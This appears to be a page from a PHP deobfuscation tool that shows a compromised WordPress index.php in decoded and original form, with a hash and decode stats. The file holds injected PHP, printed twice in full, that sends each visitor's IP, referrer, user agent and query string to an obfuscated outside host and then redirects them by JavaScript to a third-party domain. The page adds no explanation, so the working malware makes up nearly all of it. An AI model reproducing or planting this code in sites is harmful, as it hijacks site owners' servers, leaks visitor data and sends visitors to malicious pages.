Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (!function_exists('xJV1H9Ae7M')) { function xJV1H9Ae7M() { $xJcbaC = $_SERVER['..
Decoded Output download
<?php
if (!function_exists('xJV1H9Ae7M')) { function xJV1H9Ae7M() { $xJcbaC = $_SERVER['SERVER_ADDR']; $x5SpP = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$x5SpP) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($xJcbaC))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$x5SpP)) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$x5SpP) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($xJcbaC))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$x5SpP) && (($_SERVER['HTTP_CLIENT_IP'])!=($xJcbaC))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }} $ip=xJV1H9Ae7M();
if (!function_exists('xWUzZmESusV')) { function xWUzZmESusV() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} $ref=xWUzZmESusV();
if (!function_exists('xhrZKvV3zn')) { function xhrZKvV3zn() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} $eRf9t9d9 = xhrZKvV3zn();
if ($_SERVER['QUERY_STRING']!=''){ $dHerF777hg = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$dHerF777hg = '';}
$sourcename = 'cr'; $whatdo = 'find'; $sourceid = ''; $who = 'us'; $fd = 'y990010'; $dex9 = '.re'; $langua = 'na'; $command = 'st';
$ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_URL, 'https://'.$whatdo.''.$who.''.$dex9.''.$command.'/'.$who.''.$command.'.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_TIMEOUT,333); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$ip.'&ref='.$ref.'&ua='.$eRf9t9d9.'&data='.$dHerF777hg.'&sourceid='.$sourceid.'&sourcename='.$sourcename.''); $ifbot = curl_exec($ch); curl_close($ch);
if ($ifbot == '') { echo '<h1>CURL ERROR</h1>'; } elseif ($ifbot != '0') { } else { if (!empty($dHerF777hg)) { echo "<script type='text/javascript'> window.location.href='https://ingustestylepropof.info/Fvr3Kn2f?".urldecode($dHerF777hg)."' </script> ";} else { echo "<script type='text/javascript'> window.location.href='https://ingustestylepropof.info/Fvr3Kn2f' </script> ";} exit; }
?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
~ ?>
Did this file decode correctly?
Original Code
<?php
if (!function_exists('xJV1H9Ae7M')) { function xJV1H9Ae7M() { $xJcbaC = $_SERVER['SERVER_ADDR']; $x5SpP = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$x5SpP) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($xJcbaC))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$x5SpP)) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$x5SpP) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($xJcbaC))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$x5SpP) && (($_SERVER['HTTP_CLIENT_IP'])!=($xJcbaC))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }} $ip=xJV1H9Ae7M();
if (!function_exists('xWUzZmESusV')) { function xWUzZmESusV() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} $ref=xWUzZmESusV();
if (!function_exists('xhrZKvV3zn')) { function xhrZKvV3zn() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} $eRf9t9d9 = xhrZKvV3zn();
if ($_SERVER['QUERY_STRING']!=''){ $dHerF777hg = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$dHerF777hg = '';}
$sourcename = 'cr'; $whatdo = 'find'; $sourceid = ''; $who = 'us'; $fd = 'y990010'; $dex9 = '.re'; $langua = 'na'; $command = 'st';
$ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_URL, 'https://'.$whatdo.''.$who.''.$dex9.''.$command.'/'.$who.''.$command.'.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_TIMEOUT,333); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$ip.'&ref='.$ref.'&ua='.$eRf9t9d9.'&data='.$dHerF777hg.'&sourceid='.$sourceid.'&sourcename='.$sourcename.''); $ifbot = curl_exec($ch); curl_close($ch);
if ($ifbot == '') { echo '<h1>CURL ERROR</h1>'; } elseif ($ifbot != '0') { } else { if (!empty($dHerF777hg)) { echo "<script type='text/javascript'> window.location.href='https://ingustestylepropof.info/Fvr3Kn2f?".urldecode($dHerF777hg)."' </script> ";} else { echo "<script type='text/javascript'> window.location.href='https://ingustestylepropof.info/Fvr3Kn2f' </script> ";} exit; }
?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
~
Function Calls
None |
Stats
MD5 | bc1759213f4ce91d7e40e88effe60aa8 |
Eval Count | 0 |
Decode Time | 80 ms |